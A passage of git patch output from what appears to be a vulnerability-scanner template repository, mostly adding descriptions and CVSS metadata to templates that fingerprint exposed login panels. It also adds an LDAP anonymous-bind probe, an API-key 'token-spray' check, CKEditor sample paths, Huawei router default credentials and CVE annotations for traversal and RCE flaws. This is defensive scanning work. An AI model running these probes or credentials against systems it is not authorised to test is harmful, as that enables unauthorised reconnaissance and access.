cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"HighMail" @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/hitron-technologies.yaml b/exposed-panels/hitron-technologies.yaml index f2a612b392..707472bfab 100644 --- a/exposed-panels/hitron-technologies.yaml +++ b/exposed-panels/hitron-technologies.yaml @@ -1,10 +1,16 @@ id: hitron-technologies-detect info: - name: Hitron Technologies + name: Hitron Technologies Router Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7062 + description: Hitron Technologies router login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7062 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: router,panel requests: @@ -23,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/16 diff --git a/exposed-panels/hivemanager-login-panel.yaml b/exposed-panels/hivemanager-login-panel.yaml index 7195f244ce..c78d3b54eb 100644 --- a/exposed-panels/hivemanager-login-panel.yaml +++ b/exposed-panels/hivemanager-login-panel.yaml @@ -1,9 +1,14 @@ id: hivemanager-login-panel info: - name: HiveManager Login panel + name: HiveManager Login Panel - Detect author: binaryfigments,daffainfo severity: info + description: HiveManager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:1604363273 @@ -27,3 +32,5 @@ requests: - "HiveManager" - 'alt="Aerohive' condition: and + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index b9b7c6a32e..f3a8b0e540 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -1,9 +1,14 @@ id: hmc-hybris-panel info: - name: SAP Hybris Management Console + name: Hybris Management Console Login Panel - Detect author: dogasantos + description: Hybris Management Console login panel was detected. severity: info + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,sap requests: @@ -17,3 +22,5 @@ requests: words: - "hybris Management Console" part: body + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/homematic-panel.yaml b/exposed-panels/homematic-panel.yaml index dd4187d06d..ad34ebc2a3 100644 --- a/exposed-panels/homematic-panel.yaml +++ b/exposed-panels/homematic-panel.yaml @@ -1,9 +1,14 @@ id: homematic-panel info: - name: Homematic Panel Detect + name: Homematic Panel - Detect author: princechaddha severity: info + description: Homematic panel was deetcted. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.html:"Homematic" tags: panel,homematic,iot @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/honeywell-web-controller.yaml b/exposed-panels/honeywell-web-controller.yaml index 634a2b1c16..cc112f0ad4 100644 --- a/exposed-panels/honeywell-web-controller.yaml +++ b/exposed-panels/honeywell-web-controller.yaml @@ -1,11 +1,16 @@ id: honeywell-web-controller info: - name: Honeywell XL Web Controller + name: Honeywell Excel Web Control Login Panel - Detect author: dhiyaneshDK severity: info + description: Honeywell Excel Web Control login panel was detected. reference: - https://www.exploit-db.com/ghdb/7130 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: edb,panel requests: @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/honeywell-xl-web-controller.yaml b/exposed-panels/honeywell-xl-web-controller.yaml index cabda9f52c..a5e6103f52 100644 --- a/exposed-panels/honeywell-xl-web-controller.yaml +++ b/exposed-panels/honeywell-xl-web-controller.yaml @@ -1,12 +1,15 @@ id: honeywell-xl-web-controller info: - name: Honeywell XL Web Controller - author: DhiyaneshDK + name: Honeywell Excel Web Control Login Panel - Detect + author: dhiyaneshDK severity: info + description: Honeywell Excel Web Control login panel was detected. reference: - https://www.exploit-db.com/ghdb/7130 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 metadata: verified: true @@ -28,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/horde-login-panel.yaml b/exposed-panels/horde-login-panel.yaml index 57916286ba..66b38df2d6 100644 --- a/exposed-panels/horde-login-panel.yaml +++ b/exposed-panels/horde-login-panel.yaml @@ -1,9 +1,14 @@ id: horde-login-panel info: - name: Horde Login Panel + name: Horde Login Panel - Detect author: ritikchaddha severity: info + description: Horde login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-741491222 @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/horde-webmail-login.yaml b/exposed-panels/horde-webmail-login.yaml index 34d4086379..8eb06b2f1a 100644 --- a/exposed-panels/horde-webmail-login.yaml +++ b/exposed-panels/horde-webmail-login.yaml @@ -1,9 +1,14 @@ id: horde-webmail-login info: - name: Horde WebMail Login + name: Horde Webmail Login Panel - Detect author: ritikchaddha severity: info + description: Horde Webmail login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:2104916232 @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hospital-management-panel.yaml b/exposed-panels/hospital-management-panel.yaml index edaa0f9f1a..42d241ffb4 100644 --- a/exposed-panels/hospital-management-panel.yaml +++ b/exposed-panels/hospital-management-panel.yaml @@ -1,9 +1,14 @@ id: hospital-management-panel info: - name: Hospital Management System Panel + name: Hospital Management System Login Panel - Detect author: arafatansari severity: info + description: Hospital Management System login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Hospital Management System" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hp-ilo-5.yaml b/exposed-panels/hp-ilo-5.yaml index 87e687904a..201b5ff4de 100644 --- a/exposed-panels/hp-ilo-5.yaml +++ b/exposed-panels/hp-ilo-5.yaml @@ -1,11 +1,16 @@ id: hp-ilo-5 info: - name: Detects Hewlett Packard iLo 5 + name: Hewlett Packard Integrated Lights Out 5 Login Panel - Detect author: geeknik severity: info + description: Hewlett Packard Integrated Lights Out 5 login panel was detected. reference: - https://www.hpe.com/us/en/servers/integrated-lights-out-ilo.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: hp,ilo,panel requests: @@ -31,3 +36,5 @@ requests: part: header words: - "text/html" + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hp-service-manager.yaml b/exposed-panels/hp-service-manager.yaml index d4450e4ee9..c1dd1d2d1e 100644 --- a/exposed-panels/hp-service-manager.yaml +++ b/exposed-panels/hp-service-manager.yaml @@ -1,9 +1,14 @@ id: hp-service-manager info: - name: HP Service Manager + name: HP Service Manager Login Panel - Detect author: dhiyaneshDK severity: info + description: HP Service Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"HP Service Manager" tags: panel,hp,service @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hp-virtual-connect-manager.yaml b/exposed-panels/hp-virtual-connect-manager.yaml index fe38f3e169..439744c366 100644 --- a/exposed-panels/hp-virtual-connect-manager.yaml +++ b/exposed-panels/hp-virtual-connect-manager.yaml @@ -1,9 +1,14 @@ id: hp-virtual-connect-manager info: - name: HP Virtual Connect Manager + name: HP Virtual Connect Manager Login Panel - Detect author: dhiyaneshDK severity: info + description: HP Virtual Connect Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"HP Virtual Connect Manager" tags: panel,hp @@ -22,3 +27,5 @@ requests: - type: word words: - "HP Virtual Connect Manager" + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hpe-system-management-login.yaml b/exposed-panels/hpe-system-management-login.yaml index 2d004eb29d..935b6002e2 100644 --- a/exposed-panels/hpe-system-management-login.yaml +++ b/exposed-panels/hpe-system-management-login.yaml @@ -1,9 +1,14 @@ id: hpe-system-management-login info: - name: HPE System Management Login + name: Hewlett Packard Enterprise System Management Login Panel - Detect author: divya_mudgal severity: info + description: Hewlett Packard Enterprise System Management login page was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: hpe,tech,panel requests: @@ -25,3 +30,5 @@ requests: part: body regex: - "HPE System Management Homepage v([0-9-.]*)" + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/httpbin-panel.yaml b/exposed-panels/httpbin-panel.yaml index b00be623ec..a4492fe5c8 100644 --- a/exposed-panels/httpbin-panel.yaml +++ b/exposed-panels/httpbin-panel.yaml @@ -1,11 +1,16 @@ id: httpbin-panel info: - name: HTTPBin Panel Detect + name: HTTPBin Login Panel - Detect author: Adam Crosser severity: info + description: HTTPBin login panel was detected. reference: - https://github.com/postmanlabs/httpbin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"httpbin.org" tags: panel,httpbin,oss @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/huawei-hg532e-panel.yaml b/exposed-panels/huawei-hg532e-panel.yaml index 09871c83a9..0d38e0a8d3 100644 --- a/exposed-panels/huawei-hg532e-panel.yaml +++ b/exposed-panels/huawei-hg532e-panel.yaml @@ -1,13 +1,17 @@ id: huawei-hg532e-panel info: - name: Huawei HG532e Detection + name: Huawei HG532e Router Panel - Detect author: idealphase severity: info - description: The Huawei HG532e router. By default, both the username and password is user + description: Huawei HG532e router login panel was detected. After installation, both the default username and default password are user. reference: - https://setuprouter.com/router/huawei/hg532e/1194.pdf - https://www.192-168-1-1-ip.co/router/huawei/hg532e/2186/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.html:"HG532e" tags: huawei,panel @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hybris-administration-console.yaml b/exposed-panels/hybris-administration-console.yaml index ea2de8eba5..a67c40e78f 100644 --- a/exposed-panels/hybris-administration-console.yaml +++ b/exposed-panels/hybris-administration-console.yaml @@ -1,9 +1,14 @@ id: hybris-administration-console info: - name: Hybris administration console + name: Hybris Administration Console Login Panel - Detect author: princechaddha severity: info + description: Hybris Administration Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Hybris" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hydra-dashboard.yaml b/exposed-panels/hydra-dashboard.yaml index 0d43eb8eaa..0516f48e81 100644 --- a/exposed-panels/hydra-dashboard.yaml +++ b/exposed-panels/hydra-dashboard.yaml @@ -1,9 +1,14 @@ id: hydra-dashboard info: - name: Hydra Dashboard Exposed + name: Hydra Router Dashboard - Detect author: tess severity: low + description: Hydra router dashboard was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Hydra Router Dashboard" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/hypertest-dashboard.yaml b/exposed-panels/hypertest-dashboard.yaml index 2d51156994..6ff86ea052 100644 --- a/exposed-panels/hypertest-dashboard.yaml +++ b/exposed-panels/hypertest-dashboard.yaml @@ -1,12 +1,17 @@ id: hypertest-dashboard info: - name: HyperTest Common Dashboard + name: HyperTest Common Dashboard - Detect author: DhiyaneshDk severity: high + description: HyperTest Common Dashboard was detected. reference: - https://www.facebook.com/photo?fbid=487809593389565&set=a.467014098802448 - https://www.hypertest.co + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"HyperTest" @@ -30,3 +35,5 @@ requests: part: header words: - 'text/html' + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/ibm/ibm-advanced-system-management.yaml b/exposed-panels/ibm/ibm-advanced-system-management.yaml index cadb951f70..e6a58aaf70 100644 --- a/exposed-panels/ibm/ibm-advanced-system-management.yaml +++ b/exposed-panels/ibm/ibm-advanced-system-management.yaml @@ -1,9 +1,14 @@ id: ibm-advanced-system-management info: - name: IBM Advanced System Management + name: IBM Advanced System Management Panel - Detect author: dhiyaneshDK severity: info + description: IBM Advanced System Management panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Advanced System Management" tags: panel,ibm @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/ibm/ibm-maximo-login.yaml b/exposed-panels/ibm/ibm-maximo-login.yaml index d3d6992ead..d2b5d8dc62 100644 --- a/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/exposed-panels/ibm/ibm-maximo-login.yaml @@ -1,11 +1,16 @@ id: ibm-maximo-login info: - name: IBM Maximo Login Panel + name: IBM Maximo Login Panel - Detect author: ritikchaddha severity: info + description: IBM Maximo login panel was detected. reference: - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-399298961 @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/ibm/ibm-mqseries-web-console.yaml b/exposed-panels/ibm/ibm-mqseries-web-console.yaml index 57b09c66e6..6a9e1c8f22 100644 --- a/exposed-panels/ibm/ibm-mqseries-web-console.yaml +++ b/exposed-panels/ibm/ibm-mqseries-web-console.yaml @@ -1,11 +1,16 @@ id: ibm-mqseries-web-console info: - name: IBM MQSeries web console + name: IBM MQ Web Console Login Panel - Detect author: righettod severity: info + description: IBM MQ Web Console login panel was detected. reference: - https://www.ibm.com/docs/en/ibm-mq/9.0?topic=console-getting-started-mq + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,ibm requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/ibm/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml index e3beb70bb4..2251a0beca 100644 --- a/exposed-panels/ibm/ibm-note-login.yaml +++ b/exposed-panels/ibm/ibm-note-login.yaml @@ -1,11 +1,16 @@ id: ibm-note-login info: - name: IBM iNotes Login + name: IBM iNotes Login Panel - Detect author: dhiyaneshDK severity: info + description: IBM iNotes login panel was detected. reference: - https://www.exploit-db.com/ghdb/7122 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: ibm,edb,panel requests: @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/18 diff --git a/exposed-panels/open-virtualization-manager-panel.yaml b/exposed-panels/open-virtualization-manager-panel.yaml index 3860db4d63..46896e5a2e 100644 --- a/exposed-panels/open-virtualization-manager-panel.yaml +++ b/exposed-panels/open-virtualization-manager-panel.yaml @@ -9,6 +9,7 @@ info: - https://www.ovirt.org/ - https://www.ovirt.org/dropped/admin-guide/virt/console-client-resources.html classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 metadata: diff --git a/exposed-panels/sicom-panel.yaml b/exposed-panels/sicom-panel.yaml index c9f5943613..037b4d8dda 100644 --- a/exposed-panels/sicom-panel.yaml +++ b/exposed-panels/sicom-panel.yaml @@ -7,6 +7,7 @@ info: description: | Sicom MGRNG administrative login page found. classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 tags: sicom,mgrng,panel diff --git a/exposed-panels/tenda-11n-wireless-router-login.yaml b/exposed-panels/tenda-11n-wireless-router-login.yaml index b6bf46490b..1814586fe9 100644 --- a/exposed-panels/tenda-11n-wireless-router-login.yaml +++ b/exposed-panels/tenda-11n-wireless-router-login.yaml @@ -12,6 +12,7 @@ info: shodan-query: http.title:"Tenda 11N Wireless Router Login Screen" google-query: intitle:"Tenda 11N Wireless Router Login Screen" classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 tags: panel,tenda diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml index f17f947c6f..fba367aa81 100644 --- a/technologies/elfinder-detect.yaml +++ b/technologies/elfinder-detect.yaml @@ -6,6 +6,7 @@ info: description: An elFinder implementation was discovered. severity: info classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 tags: tech,elfinder From d5ec9f7d0dbd68a212d55f26e35a04dddc54aa0e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 19 Nov 2022 02:06:06 +0000 Subject: [PATCH 0476/1415] Auto Generated CVE annotations [Sat Nov 19 02:06:06 UTC 2022] :robot: --- cves/2022/CVE-2022-41840.yaml | 4 +++- exposed-panels/hitron-technologies.yaml | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index a41cd1af55..61622e6816 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -4,6 +4,8 @@ info: name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal author: theamanrawat severity: high + description: | + Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ @@ -11,7 +13,7 @@ info: classification: cve-id: CVE-2022-41840 metadata: - verified: true + verified: "true" tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop requests: diff --git a/exposed-panels/hitron-technologies.yaml b/exposed-panels/hitron-technologies.yaml index 707472bfab..d3ec8786ef 100644 --- a/exposed-panels/hitron-technologies.yaml +++ b/exposed-panels/hitron-technologies.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: router,panel + tags: panel,edb,router requests: - method: GET From 31e0b2c3a4547ac9de83e6f51f5456bbe6bf8a53 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Sat, 19 Nov 2022 11:49:01 -0500 Subject: [PATCH 0477/1415] Adding Additional Path to detect webeditors --- exposed-panels/webeditors.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposed-panels/webeditors.yaml b/exposed-panels/webeditors.yaml index 86f5dfe420..a558a8a144 100644 --- a/exposed-panels/webeditors.yaml +++ b/exposed-panels/webeditors.yaml @@ -21,6 +21,10 @@ requests: - "{{BaseURL}}/js/se2/SmartEditor2.html" - "{{BaseURL}}/nse/SmartEditor2.html" - "{{BaseURL}}/SmartEditor2.html" + - "{{BaseURL}}/apps/ckeditor/samples/old/replacebyclass.html" + - "{{BaseURL}}/plugin/editor/ckeditor/samples/old/replacebyclass.html" + - "{{BaseURL}}/latest/samples/old/replacebyclass.html" + - "{{BaseURL}}/Content/ckeditor/samples/old/replacebyclass.html" matchers: - type: word @@ -32,4 +36,6 @@ requests: - "init_spell()" - "'tip':'" - ":: Smart Editor 2" + - "Replace Textareas by Class Name" + - "CKEditor - The text editor for the Internet" condition: or From 3e925c9063c6d1e99acb768ce80bda9e507ac387 Mon Sep 17 00:00:00 2001 From: Thibault Soubiran Date: Sat, 19 Nov 2022 22:51:03 +0100 Subject: [PATCH 0478/1415] Add ldap-anonymous-login template --- network/ldap-anonymous-login.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 network/ldap-anonymous-login.yaml diff --git a/network/ldap-anonymous-login.yaml b/network/ldap-anonymous-login.yaml new file mode 100644 index 0000000000..95c7f055b9 --- /dev/null +++ b/network/ldap-anonymous-login.yaml @@ -0,0 +1,31 @@ +id: ldap-anonymous-login + +info: + name: LDAP Server NULL Bind Connection Information Disclosure + author: s0obi + severity: medium + description: The remote LDAP server allows anonymous access + reference: + - https://www.tenable.com/plugins/nessus/10723 + - https://ldap.com/ldapv3-wire-protocol-reference-bind + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-284 + remediation: Configure the service to disallow NULL BINDs. + tags: network,ldap,default-login + +network: + - inputs: + - data: 300c020101600702010304008000 + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:389" + read-size: 1024 + + matchers: + - type: binary + binary: + - "300c02010161070a010004000400" From 379fdba0887f3e060ffbc0c3ea4db4a0966836b5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 19 Nov 2022 22:04:20 +0000 Subject: [PATCH 0479/1415] Auto Generated CVE annotations [Sat Nov 19 22:04:20 UTC 2022] :robot: --- cves/2022/CVE-2022-40881.yaml | 5 ++++- cves/2022/CVE-2022-41840.yaml | 1 + 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml index ed0b04a00b..71ca0ccec7 100644 --- a/cves/2022/CVE-2022-40881.yaml +++ b/cves/2022/CVE-2022-40881.yaml @@ -11,10 +11,13 @@ info: - https://github.com/advisories/GHSA-wx3r-88rg-whxq - https://nvd.nist.gov/vuln/detail/CVE-2022-40881 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-40881 + cwe-id: CWE-77 metadata: - verified: true shodan-query: http.favicon.hash:"-244067125" + verified: "true" tags: cve,cve2022,solarview,rce,lfi variables: diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index 61622e6816..b636400b80 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -10,6 +10,7 @@ info: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 + - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: cve-id: CVE-2022-41840 metadata: From 00d9aabaa293a64e11e080a461809e2c4977a6e9 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Sun, 20 Nov 2022 13:47:25 +0000 Subject: [PATCH 0480/1415] Create api-giphy.yaml --- token-spray/api-giphy.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 token-spray/api-giphy.yaml diff --git a/token-spray/api-giphy.yaml b/token-spray/api-giphy.yaml new file mode 100644 index 0000000000..267f072da9 --- /dev/null +++ b/token-spray/api-giphy.yaml @@ -0,0 +1,23 @@ +id: api-giphy + +info: + name: Giphy API Test + author: geeknik + severity: info + reference: + - https://developers.giphy.com/branch/master/docs/api/ + tags: token-spray,giphy + +self-contained: true +requests: + - method: GET + path: + - "https://api.giphy.com/v1/gifs/trending?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"data":' + - '"type":"gif"' + condition: and From 2057ee6f97b2f6783704a5a28f53d788b7930714 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 10:18:33 +0530 Subject: [PATCH 0481/1415] Update mongodb-exporter-metrics.yaml --- misconfiguration/mongodb-exporter-metrics.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/misconfiguration/mongodb-exporter-metrics.yaml b/misconfiguration/mongodb-exporter-metrics.yaml index 8657244d73..71da517b90 100644 --- a/misconfiguration/mongodb-exporter-metrics.yaml +++ b/misconfiguration/mongodb-exporter-metrics.yaml @@ -19,9 +19,14 @@ requests: - type: word part: body words: - - "mongodb_up" + - "# HELP" + + - type: word + part: body + words: + - "mongodb" - "mongodb_exporter_build_info" - condition: and + condition: or - type: status status: From 8c87efec486620b494fc1adff4ee078bfb8ed31f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 10:26:18 +0530 Subject: [PATCH 0482/1415] Update key-cloak-admin-panel.yaml --- exposed-panels/key-cloak-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 527f1c3026..778c03b7cc 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -2,7 +2,7 @@ id: key-cloak-admin-panel info: name: Keycloak Admin Panel - author: incogbyte,righettod + author: incogbyte,righettod,daffainfo severity: info metadata: verified: true From d51d8307b1f8a3d67f1ff87f3431cf4724b250f2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 21 Nov 2022 04:56:52 +0000 Subject: [PATCH 0483/1415] Auto Generated New Template Addition List [Mon Nov 21 04:56:52 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7179c26b88..aca87dc670 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ misconfiguration/bootstrap-admin-panel-template.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/haproxy-exporter-metrics.yaml misconfiguration/installer/tasmota-install.yaml +misconfiguration/mongodb-exporter-metrics.yaml misconfiguration/pcdn-cache-node.yaml misconfiguration/phpmemcached-admin-panel.yaml misconfiguration/tasmota-config-webui.yaml From 969cb985aa6f1bcc6613ff48714630015d476744 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 21 Nov 2022 10:35:36 +0530 Subject: [PATCH 0485/1415] Update pop3-detect.yaml --- network/detection/pop3-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index 3f2d63e36e..4d1a60a13d 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -21,10 +21,9 @@ network: - "{{Hostname}}" - "{{Host}}:110" - matchers-condition: and matchers: - type: word words: - "+OK Dovecot ready" - - "USER" - "POP3" + condition: or From ebcc5f494b7ccefce3c0a06d305aa13da976c02c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 21 Nov 2022 05:13:32 +0000 Subject: [PATCH 0486/1415] Auto Generated CVE annotations [Mon Nov 21 05:13:32 UTC 2022] :robot: --- cves/2022/CVE-2022-40881.yaml | 5 ++++- cves/2022/CVE-2022-41840.yaml | 1 + 2 files changed, 5 insertions(+), 1 